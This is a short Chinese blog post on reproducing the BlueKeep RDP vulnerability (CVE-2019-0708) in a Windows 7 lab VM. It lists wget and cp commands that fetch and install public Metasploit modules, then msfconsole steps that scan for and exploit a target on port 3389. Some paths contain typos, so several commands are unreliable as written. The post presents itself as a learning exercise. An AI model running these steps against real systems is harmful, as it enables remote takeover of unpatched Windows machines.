复现CVE-2019-0708成功

2019-10-09 本文已影响0人 Enomothem

因为前段时间简书整改，所以更新较迟，下面给大家贴出我的新博客，全英文 = =
https://www.cnblogs.com/enomothem/p/11516626.html
然后是我的个人域名
https://enomothem.cn/2019/09/13/Reproduction-CVE-2019-0708/
好了，简书给大家翻译成了中文，因为在parro里操作成功的，所以建议大家去关注本人创建的parrot专题，大家一起来玩鸟啊~
细节上没能翻译过来，格式也不好看，大家可以看我英文版

Xx_介绍

请保护，尊重，爱护《中国互联网安全法》！
仅供学习参考！
请注明出处！

Ax_准备

windows 7 SP1 Download:ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/
VMware Workstation pro 15 Download:https://my.vmware.com/cn/web/vmware/info/slug/desktop_end_user_computing/vmware_workstation_pro/15_0
Metasploit 5.x Download: https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers
linux parrot Download:https://parrotlinux.org/download-security.php
CVE-2019-0708 exploit tools:

wget https://github.com/rapid7/metasploit-framework/edb7e0221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/explot/rdp.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scaner.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cp rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/
cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/
cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/
cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auiliary/scanner/rdp/

Bx_扫描

MSF update
1 apt-get update
2 apt-get install metasploit-framework
1 su root 2 msfconsole
3 reload_all
4 search 0708
5 use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
6 set rhosts xxx
7 run
image

Cx_攻击

1 use windows/rdp/cve_2019_0708_bluekeep_rce 2 set rhost xxx 3 set target xxx 4 set rport 3389 5 exploit

image

once again